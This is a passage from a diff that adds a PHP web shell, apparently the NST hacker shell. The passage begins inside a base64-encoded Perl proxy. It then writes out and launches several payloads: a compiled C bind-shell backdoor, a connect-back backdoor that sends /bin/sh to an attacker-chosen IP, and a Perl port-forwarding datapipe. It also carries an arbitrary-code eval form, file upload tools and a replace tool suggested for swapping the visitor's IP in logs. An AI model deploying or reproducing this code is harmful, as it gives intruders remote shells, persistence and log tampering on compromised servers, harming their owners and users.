ICAgICMgT25seSBwcmludCBoZWFkZXIgJiB0ZXh0IGxpbmVzIHRvIFNURE9VVA0KCSAgICBwcmludCAkXzsNCgkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15bXHNceDAwXSokLykgew0KCQkkaGVhZGVyID0gMDsNCgkgICAgfQ0KIwkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15Db250ZW50LXR5cGU6IHRleHQvKSB7DQojCQkkdGV4dCA9IDE7DQojCSAgICB9DQoJfQ0KICAgIH0NCiAgICBjbG9zZShVUkwpOw0KICAgIGNsb3NlKENISUxEKTsNCiAgICBleGl0OwkJCSMgRXhpdCBmcm9tIGNoaWxkIHByb2Nlc3MNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojLS0JYW5hbHl6ZV9yZXF1ZXN0CQkJCQkJCS0tDQojLS0JCQkJCQkJCQktLQ0KIy0tCUFuYWx5emUgYSBuZXcgcmVxdWVzdC4gIEZpcnN0IHJlYWQgaW4gZmlyc3QgbGluZSBvZiByZXF1ZXN0LgktLQ0KIy0tCVJlYWQgVVJMIGZyb20gaXQsIHByb2Nlc3MgVVJMIGFuZCBvcGVuIGNvbm5lY3Rpb24uCQktLQ0KIy0tCVJldHVybiBhbiBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QJLS0NCiMtLQltZXRob2QuCQkJCQkJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBhbmFseXplX3JlcXVlc3Qgew0KIy0tLSAgUmVhZCBmaXJzdCBsaW5lIG9mIEhUVFAgcmVxdWVzdA0KICAgICRmaXJzdCA9IDxDSElMRD47DQoNCiAgICAkdXJsID0gKCRmaXJzdCA9fiBtfChodHRwOi8vXFMrKXwpWzBdOw0KICAgIHByaW50ICJSZXF1ZXN0IGZvciBVUkw6ICAkdXJsIFxuIjsNCg0KIy0tLSAgQ2hlY2sgaWYgZmlyc3QgbGluZSBpcyBvZiB0aGUgZm9ybSBHRVQgaHR0cDovL2hvc3QtbmFtZSAuLi4NCiAgICAoJG1ldGhvZCwgJHJlbW90ZV9ob3N0LCAkcmVtb3RlX3BvcnQpID0gDQoJKCRmaXJzdCA9fiBtIShHRVR8UE9TVHxIRUFEKSBodHRwOi8vKFteLzpdKyk6PyhcZCopISApOw0KIy0tLSAgSWYgbm90LCBiYWQgcmVxdWVzdC4NCiAgICANCiAgICBpZiAoISRyZW1vdGVfaG9zdCkgew0KCXByaW50ICRmaXJzdDsNCgl3aGlsZSAoPENISUxEPikgew0KCSAgICBwcmludCAkXzsNCgkgICAgbGFzdCBpZiAoJF8gPX4gL15bXHNceDAwXSokLyk7DQoJfQ0KCXByaW50ICJJbnZhbGlkIEhUVFAgcmVxdWVzdCBmcm9tICIsIGpvaW4oIi4iLCBAaW5ldGFkZHIpLCAiXG4iOw0KIwlwcmludCBDSElMRCAiQ29udGVudC10eXBlOiB0ZXh0L3BsYWluIiwiXG5cbiI7DQoJcHJpbnQgQ0hJTEQgIkkgZG9uJ3QgdW5kZXJzdGFuZCB5b3VyIHJlcXVlc3QuXG4iOw0KCWNsb3NlKENISUxEKTsNCglleGl0Ow0KICAgIH0NCiMtLS0gIElmIHJlcXVlc3RlZCBVUkwgaXMgdGhlIHByb3h5IHNlcnZlciB0aGVuIGlnbm9yZSByZXF1ZXN0DQogICAgJHJlbW90ZV9pcCA9IChnZXRob3N0YnluYW1lKCRyZW1vdGVfaG9zdCkpWzRdOw0KICAgIGlmICgoJHJlbW90ZV9pcCBlcSAkbG9jYWxfaG9zdF9pcCkgJiYgKCRyZW1vdGVfcG9ydCBlcSAkcHJveHlfcG9ydCkpIHsNCglwcmludCAkZmlyc3Q7DQoJd2hpbGUgKDxDSElMRD4pIHsNCgkgICAgcHJpbnQgJF87DQoJICAgIGxhc3QgaWYgKCRfID1+IC9eW1xzXHgwMF0qJC8pOw0KCX0NCglwcmludCAiIC0tLSBDb25uZWN0aW9uIHRvIHByb3h5IHNlcnZlciBpZ25vcmVkLlxuIjsNCiMJcHJpbnQgQ0hJTEQgIkNvbnRlbnQtdHlwZTogdGV4dC9wbGFpbiIsIlxuXG4iOw0KCXByaW50IENISUxEICJJdCdzIG5vdCBuaWNlIHRvIG1ha2UgbWUgbG9vcCBvbiBteXNlbGYhLlxuIjsNCgljbG9zZShDSElMRCk7DQoJZXhpdDsNCiAgICB9DQojLS0tICBTZXR1cCBjb25uZWN0aW9uIHRvIHRhcmdldCBob3N0IGFuZCBzZW5kIHJlcXVlc3QNCiAgICAkcmVtb3RlX3BvcnQgPSAiaHR0cCIgdW5sZXNzICgkcmVtb3RlX3BvcnQpOw0KICAgICZvcGVuX2Nvbm5lY3Rpb24oVVJMLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7DQojLS0tICBSZW1vdmUgcmVtb3RlIGhvc3RuYW1lIGZyb20gVVJMDQogICAgICAgICRmaXJzdCA9fiBzL2h0dHA6XC9cL1teXC9dKy8vOw0KICAgICgkZmlyc3QsICRtZXRob2QpOw0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtLQlsaXN0ZW5fdG9fcG9ydChTT0NLRVQsICRwb3J0KQkJCQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgbGlzdGVucyB0byBhIHNwZWNpZmljIHBvcnQJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBsaXN0ZW5fdG9fcG9ydCB7DQogICAgbG9jYWwgKCRwb3J0KSA9ICRfWzFdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIsICRtYXhfcmVxdWVzdHMpOw0KICAgICRtYXhfcmVxdWVzdHMgPSAzOwkJIyBNYXggbnVtYmVyIG9mIG91dHN0YW5kaW5nIHJlcXVlc3RzDQogICAgJHNvY2tldF9mb3JtYXQgPSAnUyBuIGE0IHg4JzsNCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcGFja2VkX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICJcMFwwXDBcMCIpOw0KICAgIHNvY2tldCgkX1swXSwgJlBGX0lORVQsICZTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUgInNvY2tldDogJCEiOw0KICAgIGJpbmQoJF9bMF0sICRwYWNrZWRfcG9ydCkgfHwgZGllICJiaW5kOiAkISI7DQogICAgbGlzdGVuKCRfWzBdLCAkbWF4X3JlcXVlc3RzKSB8fCBkaWUgImxpc3RlbjogJCEiOw0KICAgICRjdXIgPSBzZWxlY3QoJF9bMF0pOyAgDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQogICAgfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIy0tCW9wZW5fY29ubmVjdGlvbihTT0NLRVQsICRyZW1vdGVfaG9zdG5hbWUsICRwb3J0KQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgY29ubmVjdHMgdG8gYSBjZXJ0YWluIGhvc3QJCQktLQ0KIy0tCSRsb2NhbF9ob3N0X2lwIGlzIGFzc3VtZWQgdG8gYmUgbG9jYWwgaG9zdG5hbWUgSVAgYWRkcmVzcwktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBvcGVuX2Nvbm5lY3Rpb24gew0KICAgIGxvY2FsICgkcmVtb3RlX2hvc3RuYW1lLCAkcG9ydCkgPSBAX1sxLDJdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIpOw0KICAgIGxvY2FsICgkcmVtb3RlX2FkZHIsIEByZW1vdGVfaXAsICRyZW1vdGVfaXApOw0KICAgIGxvY2FsICgkbG9jYWxfcG9ydCwgJHJlbW90ZV9wb3J0KTsNCiAgICBpZiAoJHBvcnQgIX4gL15cZCskLykgew0KCSRwb3J0ID0gKGdldHNlcnZieW5hbWUoJHBvcnQsICJ0Y3AiKSlbMl07DQoJJHBvcnQgPSA2NjY3IHVubGVzcyAoJHBvcnQpOw0KICAgIH0NCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcmVtb3RlX2FkZHIgPSAoZ2V0aG9zdGJ5bmFtZSgkcmVtb3RlX2hvc3RuYW1lKSlbNF07DQogICAgaWYgKCEkcmVtb3RlX2FkZHIpIHsNCglkaWUgIlVua25vd24gaG9zdDogJHJlbW90ZV9ob3N0bmFtZSI7DQogICAgfQ0KDQogICAgQHJlbW90ZV9pcCA9IHVucGFjaygiQzQiLCAkcmVtb3RlX2FkZHIpOw0KICAgICRyZW1vdGVfaXAgPSBqb2luKCIuIiwgQHJlbW90ZV9pcCk7DQogICAgcHJpbnQgIkNvbm5lY3RpbmcgdG8gJHJlbW90ZV9pcCBwb3J0ICRwb3J0LlxuXG4iOw0KICAgICRzb2NrZXRfZm9ybWF0ID0gJ1MgbiBhNCB4OCc7DQogICAgJGxvY2FsX3BvcnQgID0gcGFjaygkc29ja2V0X2Zvcm1hdCwgJkFGX0lORVQsIDAsICRsb2NhbF9ob3N0X2lwKTsNCiAgICAkcmVtb3RlX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICRyZW1vdGVfYWRkcik7DQogICAgc29ja2V0KCRfWzBdLCAmQUZfSU5FVCwgJlNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSAic29ja2V0OiAkISI7DQogICAgYmluZCgkX1swXSwgJGxvY2FsX3BvcnQpIHx8IGRpZSAiYmluZDogJCEiOw0KICAgIGNvbm5lY3QoJF9bMF0sICRyZW1vdGVfcG9ydCkgfHwgZGllICJzb2NrZXQ6ICQhIjsNCiAgICAkY3VyID0gc2VsZWN0KCRfWzBdKTsgIA0KDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQp9DQoNCg==";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_proxy.pl","w");
+fwrite($fp,base64_decode($perl_proxy_scp));
+passthru("nohup perl /tmp/nst_perl_proxy.pl $port &");
+unlink("/tmp/nst_perl_proxy.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_proxy_tmp");
+$fp=fopen(".nst_proxy_tmp/nst_perl_proxy.pl","w");
+fwrite($fp,base64_decode($perl_proxy_scp));
+passthru("nohup perl .nst_proxy_tmp/nst_perl_proxy.pl $port &");
+unlink(".nst_proxy_tmp/nst_perl_proxy.pl");
+rmdir(".nst_proxy_tmp");
+}
+}
+$show_ps="1";
+}#end of start perl_proxy
+
+if($_POST['c_bd']){
+$port=$_POST['port'];
+$c_bd_scp = "#define PORT $port
+#include <stdio.h>
+#include <signal.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+
+int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
+struct sockaddr_in serv_addr;
+struct sockaddr_in client_addr;
+
+int main ()
+{
+    soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+    if (soc_des == -1)
+        exit(-1);
+    bzero((char *) &serv_addr, sizeof(serv_addr));
+    serv_addr.sin_family = AF_INET;
+    serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
+    serv_addr.sin_port = htons(PORT);
+    soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
+    if (soc_rc != 0)
+        exit(-1);
+    if (fork() != 0)
+        exit(0);
+    setpgrp();
+    signal(SIGHUP, SIG_IGN);
+    if (fork() != 0)
+        exit(0);
+    soc_rc = listen(soc_des, 5);
+    if (soc_rc != 0)
+        exit(0);
+    while (1) {
+        soc_len = sizeof(client_addr);
+        soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
+        if (soc_cli < 0)
+            exit(0);
+        cli_pid = getpid();
+        server_pid = fork();
+        if (server_pid != 0) {
+            dup2(soc_cli,0);
+            dup2(soc_cli,1);
+            dup2(soc_cli,2);
+            execl(\"/bin/sh\",\"sh\",(char *)0);
+            close(soc_cli);
+            exit(0);
+        }
+    close(soc_cli);
+    }
+}
+
+";
+
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_c_bd.c","w");
+fwrite($fp,"$c_bd_scp");
+passthru("gcc /tmp/nst_c_bd.c -o /tmp/nst_bd");
+passthru("nohup /tmp/nst_bd &");
+unlink("/tmp/nst_c_bd.c");
+unlink("/tmp/nst_bd");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bd_tmp");
+$fp=fopen(".nst_bd_tmp/nst_c_bd.c","w");
+fwrite($fp,"$c_bd_scp");
+passthru("gcc .nst_bd_tmp/nst_c_bd.c -o .nst_bd_tmp/nst_bd");
+passthru("nohup .nst_bd_tmp/nst_bd &");
+unlink(".nst_bd_tmp/nst_bd");
+unlink(".nst_bd_tmp/nst_c_bd.c");
+rmdir(".nst_bd_tmp");
+}
+}
+$show_ps="1";
+}#end of c bd
+
+
+if($_POST['bc_c']){ # nc -l -p 4500
+$port_c = $_POST['port_c'];
+$ip=$_POST['ip'];
+$bc_c_scp = "#include <stdio.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <unistd.h>
+#include <fcntl.h>
+
+#include <netinet/in.h>
+#include <netdb.h>
+
+int fd, sock;
+int port = $port_c;
+struct sockaddr_in addr;
+
+char mesg[]  = \"::Connect-Back Backdoor:: CMD: \";
+char shell[] = \"/bin/sh\";
+
+int main(int argc, char *argv[]) {
+        while(argc<2) {
+        fprintf(stderr, \" %s <ip> \", argv[0]);
+        exit(0); }
+
+addr.sin_family = AF_INET;
+addr.sin_port = htons(port);
+addr.sin_addr.s_addr = inet_addr(argv[1]);
+fd = socket(AF_INET, SOCK_STREAM, 0);
+connect(fd, (struct sockaddr*)&addr, sizeof(addr));
+
+send(fd, mesg, sizeof(mesg), 0);
+
+dup2(fd, 0);
+dup2(fd, 1);
+dup2(fd, 2);
+execl(shell, \"in.telnetd\", 0);
+
+close(fd);
+return 1;
+}
+
+";
+
+if(is_writable("/tmp")){
+if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc_c.c");}
+if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc");}
+$fp=fopen("/tmp/nst_c_bc_c.c","w");
+$bd_c_scp=str_replace("!n","\n",$bd_c_scp);
+fwrite($fp,"$bc_c_scp");
+passthru("gcc /tmp/nst_c_bc_c.c -o /tmp/nst_bc_c");
+passthru("nohup /tmp/nst_bc_c $ip &");
+unlink("/tmp/nst_bc_c");
+unlink("/tmp/nst_bc_c.c");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bc_c_tmp");
+$fp=fopen(".nst_bc_c_tmp/nst_c_bc_c.c","w");
+$bd_c_scp=str_replace("!n","\n",$bd_c_scp);
+fwrite($fp,"$bc_c_scp");
+passthru("gcc .nst_bc_c_tmp/nst_c_bc_c.c -o .nst_bc_c_tmp/nst_bc_c");
+passthru("nohup .nst_bc_c_tmp/nst_bc_c $ip &");
+unlink(".nst_bc_c_tmp/nst_bc_c.c");
+unlink(".nst_bc_c_tmp/nst_bc_c");
+rmdir(".nst_bc_c_tmp");
+}
+}
+$show_ps="1";
+
+}#end of back connect C
+
+
+if($_POST['datapipe_pl']){
+$port_2=$_POST['port_2'];
+$port_3=$_POST['port_3'];
+$ip=$_POST['ip'];
+$datapipe_pl = "
+#!/usr/bin/perl
+# coded by CuTTer (rus hacker)
+use IO::Socket;
+use POSIX;
+
+\$localport=$port_2;
+\$host=\"$ip\";
+\$port=$port_3;
+
+\$daemon=1;
+
+\$DIR = undef;
+
+## Âûâîäèòü ëîã ñîáûòèé (1-äà, 0-íåò)
+\$log=0;
+
+
+
+
+\$| = 1;
+
+if (\$daemon){
+        print \"3anycKaeM daemon\n\";
+
+        \$pid = fork;
+        exit if \$pid;
+        die \"Couldn't fork: \$!\" unless defined(\$pid);
+        POSIX::setsid() or die \"Can't start a new session: \$!\";
+}
+
+%o = ('port' => \$localport,
+          'toport' => \$port,
+          'tohost' => \$host);
+
+\$ah = IO::Socket::INET->new(
+                         'LocalPort' => \$localport,
+                         'Reuse' => 1,
+                         'Listen' => 10)
+    || die \"Íåëüçÿ îòêğûòü ñîêåò äëÿ ñîåäèíåíèé: \$!\";
+
+print \"Íà÷èíàåì âûïîëíåíèÿ öèêëà.\n\" if \$log;
+\$SIG{'CHLD'} = 'IGNORE';
+\$num = 0;
+while (1) {
+        \$ch = \$ah->accept();
+        if (!\$ch) {
+                print STDERR \"Ïğåğâàíî âûïîëåíèå accept: \$!\n\";
+                next;
+        }
+
+        printf(\"Íîâûé êëèåíò: host %s, port %s.\n\",
+        \$ch->peerhost(), \$ch->peerport()) if \$log;
+        ++\$num;
+        \$pid = fork();
+        if (!defined(\$pid)) {
+                print STDERR \"Íåâîçìîæíî âûïîëíèòü fork: \$!\n\";
+    } elsif (\$pid == 0) {
+## Íîâûé ïğîöåññ
+                \$ah->close();
+                Run(\%o, \$ch, \$num);
+        } else {
+                print \"Parent: Fork ïğîøåë óñïåøíî, çàêğûâàåì ñîêåò.\n\" if \$log;
+                \$ch->close();
+        }
+}
+
+
+sub Run {
+        my(\$o, \$ch, \$num) = @_;
+        my \$th = IO::Socket::INET->new('PeerAddr' => \$o->{'tohost'},
+                                                        'PeerPort' => \$o->{'toport'});
+        print(\"Child: Äåëàåì ğåäèğåêò íà \$o->{'tohost'}, ïîğò \$o->{'toport'}.\n\") if \$log;
+        if (!\$th) {
+                printf STDERR (\"Child: Ïğåğâàí ğåäèğåêò íà %s, ïîğò %s.\n\",
+                \$o->{'tohost'}, \$o->{'toport'});
+                exit 0;
+        }
+
+        my \$fh;
+        if (\$o->{'dir'}) {
+                \$fh = Symbol::gensym();
+                open(\$fh, \">\$o->{'dir'}/tunnel\$num.log\")
+                or die \"Child: Ïğåğâàíî ñîçäàíèå ëîã ôàéëà \$o->{'dir'}/tunnel\$num.log: \$!\";
+        }
+
+        \$ch->autoflush();
+        \$th->autoflush();
+        while (\$ch || \$th) {
+                print \"Child: Âêëş÷àåì öèêë.\n\" if \$log;
+                my \$rin = \"\";
+                vec(\$rin, fileno(\$ch), 1) = 1 if \$ch;
+                vec(\$rin, fileno(\$th), 1) = 1 if \$th;
+                my(\$rout, \$eout);
+                select(\$rout = \$rin, undef, \$eout = \$rin, 120);
+                if (!\$rout  &&  !\$eout) {
+                        print STDERR \"Child: Îøèáêà Timeout.\n\";
+                }
+                my \$cbuffer = \"\";
+                my \$tbuffer = \"\";
+
+                if (\$ch && (vec(\$eout, fileno(\$ch), 1) || vec(\$rout, fileno(\$ch), 1))) {
+                        print \"Child: Æäåì äàííûõ îò êëèåíòà.\n\" if \$log;
+                        my \$result = sysread(\$ch, \$tbuffer, 1024);
+                        if (!defined(\$result)) {
+                                print STDERR \"Child: Îøèáêà ïğè ñ÷èòûâàíèè äàííûõ êëèåíòà: \$!\n\";
+                                exit 0;
+                        }
+                        if (\$result == 0) {
+                                print \"Child: Êëèåíò îòñîåäèíèëñÿ.\n\" if \$log;
+                                exit 0;
+                        }
+
+                        print \"Child: Äàííûå: \$cbuffer\n\" if \$log;
+                }
+
+                if (\$th  &&  (vec(\$eout, fileno(\$th), 1)  || vec(\$rout, fileno(\$th), 1))) {
+                        print \"Child: Æäåì äàííûõ.\n\" if \$log;
+                        my \$result = sysread(\$th, \$cbuffer, 1024);
+                        if (!defined(\$result)) {
+                                print STDERR \"Child: Íåâîçìîæíî ñ÷èòàòü äàííûå: \$!\n\";
+                                exit 0;
+                        }
+
+                        if (\$result == 0) {
+                                print \"Child: Ïğîèçîøëî îòñîåäèíåíèå.\n\" if \$log;
+                                exit 0;
+                        }
+
+                        print \"Child: Äàííûå: \$cbuffer\n\" if \$log;
+            }
+
+                if (\$fh  &&  \$tbuffer) {
+                        (print \$fh \$tbuffer);
+                }
+
+                while (my \$len = length(\$tbuffer)) {
+                        print \"Child: Îòïğàâëÿåì \$len áàéò.\n\" if \$log;
+                        my \$res = syswrite(\$th, \$tbuffer, \$len);
+                        print \"Child: Äàííûå îòïğàâëåíû.\n\" if \$log;
+                        if (\$res > 0) {
+                                \$tbuffer = substr(\$tbuffer, \$res);
+                        } else {
+                                print STDERR \"Child: Íåâîçìîæíî îòïğàâèòü äàííûå: \$!\n\";
+                        }
+                }
+
+                while (my \$len = length(\$cbuffer)) {
+                        print \"Child: Îòïğàâëÿåì \$len áàéò êëèåíòó.\n\" if \$log;
+                        my \$res = syswrite(\$ch, \$cbuffer, \$len);
+                        print \"Child: Äàííûå îòïğàâëåíû..\n\" if \$log;
+                        if (\$res > 0) {
+                                \$cbuffer = substr(\$cbuffer, \$res);
+                        } else {
+                                print STDERR \"Child: Íåâîçìîæíî îòïğàâèòü äàííûå: \$!\n\";
+                        }
+                }
+        }
+}
+
+";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_datapipe.pl","w");
+fwrite($fp,"$datapipe_pl");
+passthru("nohup perl /tmp/nst_perl_datapipe.pl &");
+unlink("/tmp/nst_perl_datapipe.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_datapipe_tmp");
+$fp=fopen(".nst_datapipe_tmp/nst_perl_datapipe.pl","w");
+fwrite($fp,"$datapipe_pl");
+passthru("nohup perl .nst_datapipe_tmp/nst_perl_datapipe.pl &");
+unlink(".nst_datapipe_tmp/nst_perl_datapipe.pl");
+rmdir(".nst_datapipe_tmp");
+}
+}
+$show_ps="1";
+
+}#end of datapipe perl
+
+
+
+
+
+if($show_ps=="1"){
+print "<center><b>[ps ux]</b></center><br><br>";
+print "<pre>";
+passthru("ps ux");
+print "</pre><br><br>";
+}
+
+
+
+echo "<form method=post><b>md5:</b><br><input name=md5 size=30>
+<Br>
+md5 online encoder/decoder (brutforce) (php) - [<a href=http://nst.void.ru/?q=releases&download=4>DOWNLOAD</a>]
+</form>
+";
+@$md5=@$_POST['md5'];
+if(@$_POST['md5']){ echo "md5:<br><textarea rows=1 cols=113>".md5($md5)."</textarea>";}
+echo "<br>
+<form method=post><b>base64 e/d:</b><br><input name=base64 size=30></form><br>";
+if(@$_POST['base64']){
+@$base64=$_POST['base64'];
+echo "
+<b>Encode: <br><textarea rows=15 cols=113>".base64_encode($base64)."</textarea><br>
+Decode:</b> <br><textarea rows=15 cols=113>".base64_decode($base64)."</textarea><br>";}
+echo "<br>
+<form method=post><b>DES:</b><br><input name=des size=30><br>
+John The Ripper [<a href=http://www.openwall.com/john/ target=_blank>Web</a>]</form><br>";
+if(@$_POST['des']){
+@$des=@$_POST['des'];
+echo "<b>Des:</b> <br><textarea rows=15 cols=113>".crypt($des)."</textarea>";}
+
+print "
+<b>eval:</b<br>
+(example: print \"Hello World\";)
+<form method=post>
+<font color=red><b>&lt;?</b><br>
+<textarea name=eval rows=15 cols=113></textarea><br>
+<b>?&gt;</b></font><br>
+<input type=submit value=Run style='width:150px;'>
+</form><br>
+";
+
+function eval_sl($editf){
+if(get_magic_quotes_gpc()==1){
+$editf=stripslashes($editf);
+}
+return $editf;
+}
+
+
+if($_POST['eval']){
+print "<b>RESULT:<br><br></b>";
+eval(eval_sl($_POST['eval']));
+print "<br><br>";
+
+print "<font color=green><b>PHP:</b><br>\r\n\r\n";
+print "&lt;?\r\n";
+print "<br>";
+print htmlspecialchars(eval_sl(($_POST['eval'])));
+print "<br>";
+print "?&gt;\r\n\r\n</font><br><br>";
+
+}
+
+echo $copyr;
+exit;}
+
+if(@$_GET['replace']=="1"){
+$ip=@$_SERVER['REMOTE_ADDR'];
+$d=$_GET['d'];
+$e=$_GET['e'];
+@$de=$d."/".$e;
+$de=str_replace("//","/",$de);
+$e=@$e;
+echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
+echo "
+Replace tool:<br>
+(You can replace any text)<br>
+File: $de<br>
+<form method=post>
+1. Your ip.<br>
+2. microsoft.com ip :)<br>
+Replace this <input name=thisX size=30 value=$ip> by this <input name=bythis size=30 value=207.46.245.156>
+<input type=submit name=doit value=Replace>
+</form>
+";
+
+if(@$_POST['doit']){
+@$thisX=$_POST['thisX'];
+@$bythis=$_POST['bythis'];
+@$e=$_GET['e'];
+$filename="$d/$e";
+$fd = @fopen ($filename, "r");
+$rpl = @fread ($fd, @filesize ($filename));
+$re=str_replace("$thisX","$bythis",$rpl);
+$x=@fopen("$d/$e","w");
+@fwrite($x,"$re");
+echo "<br><center>$thisX Replaced by $bythis<br>
+[<a href='$php_self?d=$d&e=$e'>VIew file</a>]<br><br><Br>";
+
+}
+echo $copyr;
+exit;}
+
+
+if(@$_GET['t']=="upload"){
+echo "<br>
+<a href='$php_self?d=$d&t=massupload'>* Mass upload *</a><br>
+File upload:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text size=50><br>
+<input name=where size=52 value='$d'><br>
+New file name:<br>
+<input name=newf size=30 autocomplete=off> (if empty, it will be default)<br>
+<input type=submit value=Upload name=uploadf>
+</form><br>
+";
+
+if(@$_POST['uploadf']){
+$where=$_POST['where'];
+$newf=$_POST['newf'];
+$where=str_replace("//","/",$where);
+if($newf==""){$newf=$_FILES['text']['name'];}else{$newf=$newf;}
+$uploadfile = "$where/".$newf;
+if (@move_uploaded_file(@$_FILES['text']['tmp_name'], $uploadfile)) {
+$uploadfile=str_replace("//","/",$uploadfile);
+echo "<i><br>Uploaded to $uploadfile</i><br>";
+}else{
+echo "<i><br>Error</i><br>";}
+}
+}
+
+if(@$_GET['t']=="massupload"){
+echo "
+Mass upload:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text1 size=43> <input type=file name=text11 size=43><br>
+<input type=file name=text2 size=43> <input type=file name=text12 size=43><br>
+<input type=file name=text3 size=43> <input type=file name=text13 size=43><br>
+<input type=file name=text4 size=43> <input type=file name=text14 size=43><br>
+<input type=file name=text5 size=43> <input type=file name=text15 size=43><br>
+<input type=file name=text6 size=43> <input type=file name=text16 size=43><br>
+<input type=file name=text7 size=43> <input type=file name=text17 size=43><br>
+<input type=file name=text8 size=43> <input type=file name=text18 size=43><br>
+<input type=file name=text9 size=43> <input type=file name=text19 size=43><br>
+<input type=file name=text10 size=43> <input type=file name=text20 size=43><br>
+<input name=where size=43 value='$d'><br>
+<input type=submit value=Upload name=massupload>
+</form><br>";
+
+if(@$_POST['massupload']){
+$where=@$_POST['where'];
+$uploadfile1 = "$where/".@$_FILES['text1']['name'];
+$uploadfile2 = "$where/".@$_FILES['text2']['name'];
+$uploadfile3 = "$where/".@$_FILES['text3']['name'];
+$uploadfile4 = "$where/".@$_FILES['text4']['name'];
+$uploadfile5 = "$where/".@$_FILES['text5']['name'];
+$uploadfile6 = "$where/".@$_FILES['text6']['name'];
+$uploadfile7 = "$where/".@$_FILES['text7']['name'];
+$uploadfile8 = "$where/".@$_FILES['text8']['name'];
+$uploadfile9 = "$where/".@$_FILES['text9']['name'];
+$uploadfile10 = "$where/".@$_FILES['text10']['name'];
+$uploadfile11 = "$where/".@$_FILES['text11']['name'];
+$uploadfile12 = "$where/".@$_FILES['text12']['name'];
+$uploadfile13 = "$where/".@$_FILES['text13']['name'];
+$uploadfile14 = "$where/".@$_FILES['text14']['name'];
+$uploadfile15 = "$where/".@$_FILES['text15']['name'];
+$uploadfile16 = "$where/".@$_FILES['text16']['name'];
+$uploadfile17 = "$where/".@$_FILES['text17']['name'];
+$uploadfile18 = "$where/".@$_FILES['text18']['name'];
+$uploadfile19 = "$where/".@$_FILES['text19']['name'];
+$uploadfile20 = "$where/".@$_FILES['text20']['name'];
+if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Uploaded to $uploadfile1</i><br>";}
